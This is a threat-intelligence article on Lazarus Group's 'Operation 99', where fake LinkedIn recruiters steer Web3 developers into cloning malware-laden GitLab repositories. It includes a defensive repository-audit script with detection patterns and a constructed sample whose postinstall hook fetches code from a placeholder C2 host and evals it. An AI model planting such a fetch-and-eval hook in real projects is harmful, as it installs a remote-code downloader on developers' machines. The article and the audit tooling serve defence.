The Lazarus Group, a notorious North Korean cybercrime syndicate, has launched a new cyberattack campaign named Operation 99, aimed at software developers in the Web3 and cryptocurrency sectors. The attackers use fake LinkedIn profiles to lure developers with promises of freelance opportunities, delivering malware in the process.
Fake LinkedIn Profiles as Bait
According to Ryan Sherstobitoff, Senior Vice President of Threat Research and Intelligence at SecurityScorecard, "The campaign begins with fake recruiters on platforms like LinkedIn, enticing developers with project tests and code reviews." Once a developer shows interest, they are directed to clone a malicious GitLab repository which appears harmless but is laden with malware. When the developer runs the cloned code, it connects to a command-and-control (C2) server and installs malware on the victim's system.
Global Impact of Operation 99
Victims of Operation 99 have been identified globally, with a significant concentration in Italy. Other impacted regions include Argentina, Brazil, Egypt, France, Germany, India, Indonesia, Mexico, Pakistan, the Philippines, the U.K., and the U.S. While precise victim data remains undisclosed, the attackers have successfully convinced developers to run the malicious code.
The name "Operation 99" is derived from version identifiers labeled pay99, used in the malware’s artifacts. The campaign builds on similar tactics observed in previous Lazarus operations, such as Operation Dream Job (NukeSped), but with a targeted focus on Web3 and cryptocurrency developers.
Advanced Tactics and AI-Driven Deception
Lazarus Group continues to evolve its methods, using advanced techniques like AI-generated profiles and realistic communication strategies. Sherstobitoff stated, "These increasingly sophisticated and authentic lures deceive even the most vigilant individuals, exploiting human trust and curiosity." These tactics make it easier for the attackers to create convincing scenarios, leading developers into their trap.
Deceptive LinkedIn Profiles and Malicious Repositories
In Operation 99, attackers target developers with coding project opportunities as part of an elaborate recruitment scheme. Fake LinkedIn profiles are crafted to entice developers, who are then directed to compromised GitLab repositories. The goal is to deploy malware designed to steal sensitive data, such as source code, secret keys, and cryptocurrency wallet credentials.
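The lure described above works because a "coding test" repository can execute code the moment a developer installs its dependencies or opens it in an editor. The following is an added example, not code from the article or from SecurityScorecard: a pre-run audit script that lists the places where a freshly cloned repository can run code without being asked (npm lifecycle scripts, install/build files, VS Code folder-open tasks, active git hooks) and greps source files for network, process-execution and decoding primitives. The file names, the regular expressions and the sample repository built by `build_sample_repo` are assumptions for illustration; the C2 hostname in the sample is a constructed placeholder. Findings are hints for a manual read-through before anything is executed, not a verdict.

```python
"""Pre-run audit of a cloned repository (added example, not the article's code)."""
import json
import re
from pathlib import Path

# package.json script keys that npm/yarn run during 'npm install' without user intent
NPM_AUTORUN_KEYS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
# Files that execute as part of a normal install/build step and deserve a read first
AUTORUN_FILES = {"setup.py", "Makefile", "Dockerfile", "build.gradle", "Rakefile"}
# Heuristic patterns (assumed, not an exhaustive list) for risky primitives
SUSPICIOUS_PATTERNS = {
    "network": re.compile(r"https?://|\bsocket\b|\bfetch\(|\bnet\.connect\b", re.I),
    "exec": re.compile(r"child_process|\bexec\(|\bspawn\(|\bsubprocess\b|\beval\(", re.I),
    "decode": re.compile(r"\batob\(|base64|fromCharCode", re.I),
}
SCAN_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh", ".json"}
MAX_SCAN_BYTES = 2_000_000


def _finding(kind, path, detail):
    return {"kind": kind, "path": str(path), "detail": detail}


def check_npm_lifecycle(root: Path):
    """Flag package.json scripts that run automatically on install."""
    findings = []
    for pkg in root.rglob("package.json"):
        if "node_modules" in pkg.parts:
            continue
        try:
            scripts = json.loads(pkg.read_text(encoding="utf-8")).get("scripts", {})
        except (ValueError, OSError):
            continue
        for key in sorted(NPM_AUTORUN_KEYS & set(scripts)):
            findings.append(_finding("npm-lifecycle", pkg.relative_to(root), f"{key}: {scripts[key]}"))
    return findings


def check_autorun_files(root: Path):
    """Flag build/install files that execute code during a normal setup step."""
    return [_finding("autorun-file", p.relative_to(root), "runs during install/build")
            for p in root.rglob("*") if p.name in AUTORUN_FILES and ".git" not in p.parts]


def check_editor_tasks(root: Path):
    """Flag VS Code tasks configured to run when the folder is opened.
    tasks.json may contain comments, so a regex is used instead of json.loads."""
    tasks = root / ".vscode" / "tasks.json"
    if not tasks.is_file():
        return []
    text = tasks.read_text(encoding="utf-8", errors="replace")
    if re.search(r'"runOn"\s*:\s*"folderOpen"', text):
        return [_finding("editor-task", tasks.relative_to(root), "task runs on folderOpen")]
    return []


def check_git_hooks(root: Path):
    """Flag active hooks. 'git clone' does not transport hooks, but a zip archive
    or a vendored .git directory handed over by a 'recruiter' can carry them."""
    hooks = root / ".git" / "hooks"
    if not hooks.is_dir():
        return []
    return [_finding("git-hook", h.relative_to(root), "active hook script")
            for h in hooks.iterdir() if h.is_file() and not h.name.endswith(".sample")]


def scan_sources(root: Path):
    """Grep source files for network, process-execution and decoding primitives."""
    findings = []
    for p in root.rglob("*"):
        if ".git" in p.parts or "node_modules" in p.parts or not p.is_file():
            continue
        if p.suffix not in SCAN_SUFFIXES or p.stat().st_size > MAX_SCAN_BYTES:
            continue
        text = p.read_text(encoding="utf-8", errors="replace")
        for label, pat in SUSPICIOUS_PATTERNS.items():
            hits = sorted({m.group(0) for m in pat.finditer(text)})
            if hits:
                findings.append(_finding(f"source-{label}", p.relative_to(root), ", ".join(hits[:5])))
    return findings


def audit_repo(path: str):
    """Run every check against the repository at `path` and return all findings."""
    root = Path(path)
    findings = []
    for check in (check_npm_lifecycle, check_autorun_files, check_editor_tasks,
                  check_git_hooks, scan_sources):
        findings.extend(check(root))
    return findings


def build_sample_repo(path: str):
    """Constructed sample resembling a harmless-looking 'coding test' project
    whose postinstall step fetches and evaluates a remote stage (placeholder host)."""
    root = Path(path)
    (root / "src").mkdir(parents=True, exist_ok=True)
    (root / "package.json").write_text(json.dumps({
        "name": "coding-test", "scripts": {"test": "jest", "postinstall": "node src/setup.js"}}))
    (root / "src" / "setup.js").write_text(
        'const cp = require("child_process");\n'
        'fetch("http://c2.example.invalid/stage").then(r => r.text()).then(s => eval(atob(s)));\n')
    (root / "src" / "index.js").write_text("module.exports = (a, b) => a + b;\n")
    return root


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_repo(tmp)
        for f in audit_repo(tmp):
            print(f"[{f['kind']}] {f['path']}: {f['detail']}")
```

Run it as `python audit_repo.py <path-to-clone>` after swapping the sample for the real directory; the intended workflow is to clone into a disposable VM or container, run the audit, read every flagged file, and only then run the project's install step. The npm lifecycle check is the most valuable one in practice, because `npm install` executes `postinstall` before the developer has opened a single file.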
Key Malware Payloads in Operation 99
The malware used in this campaign includes Main5346 and its variant Main99, which act as downloaders for three additional payloads:
- Payload99/73 (and its variant Payload5346): Collects system data, terminates web browser processes, executes arbitrary commands, and maintains a persistent connection to the C2 server.
- Brow99/73: Targets web browsers to facilitate credential theft.
- MCLIP: Monitors and exfiltrates keyboard and clipboard data in real time.
By compromising developer environments, attackers exfiltrate intellectual property and gain access to cryptocurrency wallets, potentially leading to direct financial theft. The theft of private and secret keys could result in millions of dollars in stolen digital assets, further fueling Lazarus Group’s financial goals.
A Modular, Cross-Platform Malware Architecture
The malware deployed in Operation 99 is designed with modularity and flexibility, capable of targeting Windows, macOS, and Linux operating systems. This adaptability highlights the evolving and sophisticated nature of nation-state cyber threats.
Sherstobitoff emphasized, "For North Korea, hacking is a critical revenue-generating lifeline. Lazarus Group has funneled stolen cryptocurrency to support the regime's ambitions, amassing enormous sums. As the Web3 and cryptocurrency industries continue to grow, Operation 99 focuses on these high-value sectors."
Conclusion: The Growing Threat of Nation-State Cybercrime
Operation 99 underscores the ongoing threat posed by advanced nation-state actors like Lazarus Group. As the Web3 and cryptocurrency industries flourish, developers must remain vigilant against increasingly sophisticated phishing and malware attacks. With targeted campaigns like Operation 99, Lazarus Group is positioning itself to continue exploiting this rapidly expanding sector for financial gain.
Stay informed and protect your development environment to avoid falling victim to these evolving cyber threats.